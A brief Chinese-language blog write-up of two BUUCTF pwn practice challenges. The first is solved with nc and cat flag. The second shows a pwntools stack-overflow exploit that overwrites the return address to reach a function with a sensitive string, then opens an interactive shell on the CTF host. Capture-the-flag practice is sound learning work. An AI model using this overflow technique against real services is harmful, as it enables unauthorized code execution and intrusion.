BUU_PWN

BUU PWN

1

TEST_your_nc

image-20210511235204041

nc 连接然后cat flag 即可

2

image-20210511235252300

下载附件可以得到

image-20210511235626817

可以看到gets猜想大概是溢出攻击

然后看到fun函数中有敏感字符

image-20210511235706687

所以直接溢出攻击,

EXP:

1
2
3
4
5
6
7
from pwn import *
io=remote('node3.buuoj.cn','29553')
p=b'a'*15+p64(0x401186)
print(p)
io.sendline(p)
io.interactive()

image-20210511235840314

得到弗莱格。

持续更新中~


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!